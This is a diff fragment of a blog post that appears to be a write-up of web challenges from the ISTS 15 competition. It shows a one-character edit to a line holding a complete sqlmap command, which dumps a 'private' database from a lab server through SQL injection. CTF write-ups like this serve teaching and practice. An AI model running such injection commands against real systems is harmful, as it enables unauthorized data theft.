kukfa/kukfa.github.io/_posts/2017-05-07-ists-15-web-challenges.md

 ![Our flag!](/resources/ists15/28.PNG)

 Note that it *is* possible to complete this challenge with SQLmap, but it's intentionally designed to be difficult to do so.
 The SQLmap command to pull the `private` database is:

-`sqlmap --data='month=January&day=1&year=1999' --level=5 -u http://192.168.132.133/index.php --threads=4 -D private --dump`.
+`sqlmap --data='month=January&day=1&year=1999' --level=5 -u http://192.168.132.133/index.php --threads=4 -D private --dump`

 The process of deriving that command is left as an exercise for the reader.

 ## 400